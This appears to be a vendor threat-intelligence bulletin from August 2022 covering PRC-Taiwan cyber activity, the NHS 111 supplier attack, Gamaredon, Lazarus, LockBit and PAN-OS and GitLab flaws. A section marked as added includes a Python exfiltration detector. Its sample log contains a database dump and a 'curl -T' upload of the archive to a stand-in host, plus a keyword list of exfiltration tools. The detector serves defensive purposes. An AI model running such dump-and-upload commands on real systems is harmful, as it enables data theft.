Threat Intel Roundup

Published: 31 August 2022

Content

01. Summary
02. Threat Spotlight
  • Pelosi visit encourages PRC-Taiwan cyber attacks
  • British “111” NHS hit by cyber attack
  • Gamaredon Group delivers infostealer to Ukrainian targets
  • Lazarus Group lures job seekers with fake employment prospects
03. Quick News Bites
  • LockBit under DDoS attack: Entrust strikes back?
  • CISA warns of high-severity flaw, requires government patching
  • GitLab discovers critical RCE vulnerability
04. Conclusion

A Note From The Cyber Threat Response Team

Sometimes a bit of luck can tip a victim off to a threat actor in their network. Take one case, for example, where a company’s database server suddenly crashed despite having substantial computing resources available. The database engineers investigated and found that a database dump, compression and export command had been attempted on the server in the early hours of that morning. Subsequent investigation found that a threat actor was stealing data prior to encrypting it in a ransomware attack. The lesson here is that companies should never rely purely on security events to detect a breach. Sometimes a crash or other non-security-related anomaly can indicate that something bad is about to happen. We’ve observed attackers that are purposely very quiet, and others that do not care about the noise they create. This also depends on the stage of the attack: generally speaking, the earlier in the attack chain they are, the quieter they will try to be.
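The detection the note points at, written as an added example that is not part of the original roundup: a small detector that walks process-audit lines for a per-user dump, compress, export chain, rates off-hours chains higher, and correlates them with a later crash time. The log lines, the command families in STAGES, the 00:00-05:59 off-hours window and the 30-minute chain window are all constructed assumptions.

```python
from datetime import datetime, timedelta
# Constructed process-audit lines, "<ISO timestamp> <user> <command>" (not real data)
SAMPLE_LOG = """\
2022-08-10T14:02:11 dbadmin pg_dump -Fc orders > /backups/orders.dump
2022-08-10T14:05:40 dbadmin gzip /backups/orders.dump
2022-08-11T03:12:05 svc_report pg_dump -Fc customers > /tmp/.c.dump
2022-08-11T03:14:22 svc_report tar czf /tmp/.c.tgz /tmp/.c.dump
2022-08-11T03:16:48 svc_report curl -T /tmp/.c.tgz https://files.example/up
2022-08-11T03:21:00 kernel postgres[2211]: out of memory, process killed"""
# Assumed command families for each stage of a dump -> compress -> export chain
STAGES = {"dump": ("pg_dump", "mysqldump", "expdp"),
          "compress": ("gzip", "tar ", "7z ", "zip "),
          "export": ("curl ", "scp ", "rclone")}
WANT = ("dump", "compress", "export")
OFF_HOURS = range(0, 6)         # assumption: 00:00-05:59 is outside normal operations
WINDOW = timedelta(minutes=30)  # the whole chain must complete within this span

def parse(log):
    """Split each audit line into (timestamp, user, command)."""
    rows = [line.split(" ", 2) for line in log.splitlines()]
    return [(datetime.fromisoformat(ts), user, cmd) for ts, user, cmd in rows]

def stage_of(cmd):
    return next((s for s, needles in STAGES.items()
                 if any(n in cmd for n in needles)), None)

def find_exfil_chains(events):
    """Flag, per user, a dump -> compress -> export chain completed within WINDOW."""
    findings, progress = [], {}  # progress[user] = (chain start, next stage index)
    for ts, user, cmd in events:
        stage = stage_of(cmd)
        if stage is None:
            continue
        start, i = progress.get(user, (ts, 0))
        if stage == "dump" or ts - start > WINDOW:
            start, i = ts, 0     # a new dump or a stale window restarts the chain
        if stage == WANT[i]:
            i += 1
        if i == len(WANT):
            sev = "high" if start.hour in OFF_HOURS else "medium"  # off-hours is the crash-case signal
            findings.append({"user": user, "start": start.isoformat(), "severity": sev})
            progress.pop(user, None)
        else:
            progress[user] = (start, i)
    return findings

def chains_before(findings, crash_ts, lookback=timedelta(hours=6)):
    """The correlation from the note: chains that started shortly before a crash."""
    return [f for f in findings
            if crash_ts - lookback <= datetime.fromisoformat(f["start"]) <= crash_ts]
```

Feeding a real crash timestamp from monitoring into chains_before turns a "non-security" outage ticket into a triage lead without waiting for an EDR alert.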

Threat Spotlight

Pelosi visit encourages PRC-Taiwan cyber attacks

In early August, the US House of Representatives Speaker Nancy Pelosi visited Taiwan to reiterate US support for Taipei. This diplomatic mission put further strain on the complicated relationship between the PRC and Taiwan. After threatening “severe consequences” if Taiwan allowed Pelosi to visit, Beijing carried out several military drills off the coasts of Taiwan to display its strength and its disapproval of Pelosi’s mission. As often happens during tense geopolitical situations, the parties involved quietly exchanged low-intensity cyber activity. Since Pelosi landed in Taiwan on 02 Aug 2022, the following malicious cyber activity has been observed:

  • Between 02 and 04 Aug 2022, the websites of Taiwan’s presidential office and Taiwan’s defense and foreign ministries were targeted by a distributed denial of service (DDoS) attack. No one has claimed responsibility for the attack, but the source IP addresses of the attack originated from outside of Taiwan.
  • On 03 Aug 2022, members of the hacktivist group “Anonymous” reportedly defaced the webpage of the Heilongjiang Provincial Federation of Social Sciences (“hljskl[.]gov[.]cn”), a Chinese government institution. According to an archived version of the webpage, the defaced version included statements of support for Taiwan, as well as images of Nancy Pelosi and Taiwan President Tsai Ing-wen.
  • On 04 Aug 2022, advanced persistent threat (APT) group “APT27” (aka Emissary Panda, Bronze Union, Iron Tiger) allegedly shut down 60,000 Taiwanese Internet of Things (IoT) devices. The group, which likely operates on behalf of the PRC state, has since reportedly also claimed responsibility for DDoS attacks against Taiwanese government ministries.
  • On 04 Aug 2022, researchers observed a new disinformation campaign dubbed HaiEnergy. The campaign reportedly distributed fake news articles on subjects supporting the interests of the PRC. The major themes included Pelosi’s visit, Hong Kong’s electoral reform, and the treatment of the Uyghur population in the PRC.

British “111” NHS hit by cyber attack

On 04 Aug 2022, a cyber attack targeted Advanced, a managed service provider (MSP) that provides IT and software services to clients including the UK’s National Health Service (NHS). The attack impacted the NHS 111 emergency service, causing severe delays to ambulances and general practitioners’ appointments. This incident highlights why MSPs are valuable targets for threat actors: compromising a single provider propagates the attack’s impact to multiple victims at the same time.

Gamaredon Group delivers infostealer to Ukrainian targets

On 15 Aug 2022, security researchers reported that “Gamaredon Group” has been conducting a cyber-espionage campaign targeting Ukraine. Activity was first observed on 15 Jul 2022, and most recently on 08 Aug 2022. The group reportedly delivered variants of a PowerShell information stealer (infostealer) to Ukrainian targets, as well as custom backdoors, including “Pterodo” and “Giddome”. Researchers believe that the malware was delivered via spearphishing emails, likely with lures pertaining to the Russia-Ukraine war.

Lazarus Group lures job seekers with fake employment prospects

On 17 Aug 2022, researchers reported that the North Korea-linked APT “Lazarus Group” had been using a signed malicious executable designed to target macOS systems. Lazarus Group members were impersonating employees of the cryptocurrency-exchange company Coinbase, targeting job seekers in the financial technology sector. The campaign targeted both new and old macOS versions, and used malware disguised as a PDF file containing a fake job description. The macOS malware was code-signed on 21 Jul 2022 with a certificate that had been issued five months earlier to a developer using the name Shankey Nohria. As of 12 Aug 2022, Apple had not revoked the certificate, but the binary had also not been checked by Apple’s process for discovering malicious software components.

Quick News Bites

LockBit under DDoS attack: Entrust strikes back?

On 18 Aug 2022, the LockBit ransomware group threatened to leak the data of the company Entrust on the group’s darkweb data-leak site. Entrust is a US-based cyber-security firm whose offerings to companies include cloud security, identity verification, and secure payments. Entrust was reportedly breached by LockBit in June 2022 and the firm confirmed the breach to customers in a July 2022 notification. Following a series of unsuccessful negotiations, which likely ended without a ransom payment, LockBit named Entrust on its site and threatened to leak its data.

CISA warns of high-severity flaw, requires government patching

On 22 Aug 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory warning of a vulnerability found in Palo Alto Networks’ PAN-OS: CVE-2022-0028. The flaw allows a remote threat actor, without authentication, to carry out DDoS attacks against devices. Several PA-Series, VM-Series, and CN-Series Palo Alto devices are reportedly affected by the vulnerability. Palo Alto has released patches for all affected devices, and CISA has directed US federal agencies to apply the fixes by 09 Sep 2022.

GitLab discovers critical RCE vulnerability

On 24 Aug 2022, GitLab, a code repository and software development platform, warned users of a critical remote code execution (RCE) vulnerability affecting all versions of GitLab from 11.3.4 to 15.1.4, as well as those between 15.2 and 15.2.3, and 15.3. The vulnerability allows attackers to achieve RCE via the GitLab feature used for importing software projects from GitHub into GitLab. RCE vulnerabilities may allow attackers to take control of affected servers, steal or delete source code, or push malicious code commits.

Closing Summary

If you are worried about any of the threats outlined in this bulletin, or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively email us at TBD@integrity360.com for a complimentary, no-commitments consultation. Also feel free to explore the many cyber security resources available on our website at https://www.integrity360.com/resources.

Disclaimer

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.

Need advice?

If you are worried about any of the threats outlined in this roundup or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager or fill in the form for a complimentary no-commitment consultation.

More detailed threat intelligence news?

If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.

We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.